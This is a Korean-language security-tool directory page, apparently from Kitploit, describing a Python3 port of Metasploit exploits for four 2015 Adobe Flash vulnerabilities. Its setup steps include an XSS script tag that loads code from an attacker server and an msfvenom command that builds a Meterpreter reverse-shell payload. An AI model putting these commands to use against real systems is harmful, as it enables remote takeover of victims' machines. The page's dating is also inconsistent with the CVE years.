Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Adobe-Flash-Exploits_17-18 — Adobe Flash 취약점(CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, CVE-2015-5122)용 Metasploit 익스플로잇을 Python3 스크립트로 변환했습니다. | Kitploit
도구/GitHubGitHub/xattam1/adobe-flash-exploits_17-18
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubxattam1/adobe-flash-exploits_17-18

Adobe-Flash-Exploits_17-18

Adobe Flash 취약점(CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, CVE-2015-5122)용 Metasploit 익스플로잇을 Python3 스크립트로 변환했습니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
14년 전아직 검토되지 않음

Adobe Flash 익스플로잇 CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 및 CVE-2015-5122 Python3 스크립트

Adobe Flash 취약점 CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 및 CVE-2015-5122에 대한 Metasploit 익스플로잇을 Python3 스크립트로 변환했습니다.

정보

이 스크립트는 다음 Adobe Flash 취약점 중 한 번에 하나씩 악용할 수 있는 웹 서버를 호스팅합니다.

  1. CVE-2015-3090
  2. CVE-2015-3105
  3. CVE-2015-5119
  4. CVE-2015-5122

실행

요구 사항에 맞게 exploit.py를 수정해야 합니다(여기에 설명되어 있음).

수정 사항

  • hostname = "192.168.1.100"
    • 이것은 악용 웹 서버를 호스팅할 공격 시스템의 IP입니다.
  • serverPort = 8080
    • 이것은 악용 웹 서버를 호스팅할 공격 시스템의 포트입니다.
  • xss = False
    • True로 설정하면 피해자의 서버에 대한 첫 번째 요청이 JavaScript로 처리됩니다:
      • XSS 삽입 예시:
        • <script src="http://192.168.1.100:8080/"></script>
      • 공격 경로:
        • 피해자 요청 1 -> XSS 취약 서버:
          • 피해자는 JavaScript 파일을 요청하는 원격 서버의 XSS 삽입에 접근합니다(요청 2 참조).
        • 피해자 요청 2 -> 공격 시스템의 JavaScript 소스.
        • 피해자 요청 3 -> 악성 swf 파일.
    • False로 설정하면 피해자의 서버에 대한 첫 번째 요청이 HTML로 처리됩니다:
      • 예시:
        • http://192.168.1.100:8080/
      • 공격 경로:
        • 피해자 요청 1 -> 공격 시스템의 HTML 파일.
        • 피해자 요청 2 -> 악성 swf 파일.
  • base64Payload = "..."
    • 이것은 피해자 시스템에서 실행될 base64 페이로드입니다.
    • 아래 예시 명령을 요구 사항에 맞게 수정하여 페이로드를 생성하십시오:
      • 예시:
        • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
      • 참고: 저에게 작동한 유일한 페이로드는 windows/meterpreter/reverse_tcp입니다.

  • swfFile = swfFileList['37368']
    • 피해자 시스템을 악용하는 데 사용할 Adobe Flash 악용 swf 파일을 선택하십시오:
      • root@kitploit:~
        swfFileList = {
            '37368': 'CVE-2015-3090.swf',
            '37448': 'CVE-2015-3105.swf',
            '37523': 'CVE-2015-5119.swf',
            '37599': 'CVE-2015-5122.swf'
        }
        

실행

악성 swf 파일과 같은 디렉터리에서 다음 명령을 실행하여 Adobe Flash 악용 스크립트를 실행하십시오:

  • python3 exploit.py

참조:

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599

도구 다운로드